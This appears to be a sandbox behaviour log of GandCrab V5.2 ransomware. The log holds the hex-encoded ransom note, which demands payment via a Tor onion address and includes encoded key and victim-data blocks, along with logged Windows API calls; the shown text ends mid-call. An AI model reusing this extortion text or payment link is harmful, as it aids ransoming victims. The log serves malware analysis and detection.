(lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0094.717] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0094.717] CloseHandle (hObject=0x2c4) returned 1 [0094.717] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.718] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.718] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x28, wMilliseconds=0x19)) [0094.718] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.718] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0094.718] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0094.718] wsprintfW (in: param_1=0x1e70000, 